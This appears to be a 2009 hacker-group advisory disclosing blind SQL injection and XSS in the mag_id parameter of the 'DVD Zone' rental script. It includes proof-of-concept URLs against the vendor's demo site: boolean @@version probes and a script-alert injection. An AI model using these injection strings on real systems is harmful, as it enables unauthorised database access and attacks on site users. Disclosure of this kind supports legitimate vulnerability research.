[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title        : DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities              |
 | Software     : DVD Zone Boast Your DVD Rental Business                      |
 | Vendor       : http://www.vastal.com/                          |
 | Demo      : http://dvdzone.vastal.com                          |
 | Price    : $399.99                              |
 | Date        : 22 September 2009 ( Indonesia )                        |
 | Author       : OoN_Boy                              |
 | Contact      : oon.boy9@gmail.com                            |
 | Web          : http://oonboy.info                            |
 | Blog         : http://oonboy.blogspot.com                          |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Description     : You can boast the revenue generated by your DVD Rental Business by allowing the users to order online. We have    |
 |        provided many features which can be really useful for the users who may wish to rent a DVD. They can add a DVD in |
 |        their wish list and can move the DVD's on their wish list up or down depending on the priority on which they want |
 |        to rent that DVD. They can see the DVD's which have been sent to them and are on their hands by just visiting     |
 |        their account. So there is no delay in returning them. You have full control of the genres you want to use through|
 |        our extensive admin panel. You can add as many DVD's as you want with just a click. You have full control over the|
 |        CMS of the website, you can edit it on the fly. We have provided a HTML WYSIWYG Editor so you do not have to do   |
 |        any kind pf programming. Please check out the demo site to see the script in action            |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Google Dork     : uh  ah  oh....                            |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Exploit     : http://localhost/[path]/view_mag.php?mag_id=[sql]                      |
 |      : http://localhost/[path]/view_mag.php?mag_id=[xss]
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Proof of concept  : http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True            |
 |        http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False            |
 |        http://dvdzone.vastal.com/view_mag.php?mag_id=<script>alert(123)</script>
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Greetz    : antisecurity.org batamhacker.or.id                                                                                |
 |         Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 |           k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Note      : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)        |
 |        kabur.... untuk sementara waktu.... bye bye.....                    |
[x]========================================================================================================================================[x]